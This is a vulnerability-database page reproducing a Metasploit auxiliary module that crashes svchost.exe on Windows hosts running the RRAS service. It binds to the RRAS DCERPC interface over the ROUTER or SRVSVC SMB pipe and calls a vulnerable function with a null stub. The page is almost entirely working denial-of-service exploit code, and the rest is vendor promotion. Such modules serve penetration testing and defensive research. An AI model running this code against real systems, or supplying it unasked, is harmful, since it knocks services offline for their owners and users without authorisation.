Lucene search
K

Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference

🗓️ 15 Jun 2006 15:52:01Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 15 Views

Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference on Window

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary


  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
      'Description'    => %q{
        This module triggers a NULL dereference in svchost.exe on
      all current versions of Windows that run the RRAS service. This
      service is only accessible without authentication on Windows XP
      SP1 (using the SRVSVC pipe).
      },

      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '64340'],

        ],
      'Actions'     =>
        [
          ['Attack', 'Description' => 'Run Denial of Service'],
        ],
      'DefaultAction' => 'Attack',
      'DisclosureDate' => '2006-06-14'
    ))

    register_options(
      [
        OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
      ])

  end

  def run
    connect
    smb_login

    case action.name
    when 'Attack'

      handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

      print_status("Binding to #{handle} ...")
      dcerpc_bind(handle)
      print_status("Bound to #{handle} ...")
      stb = [0, 0, 0, 0].pack('V*')

      print_status("Calling the vulnerable function...")
      begin
        dcerpc.call(0x0C, stb)
      rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      rescue => e
        if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
          raise e
        end
      end

    end

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation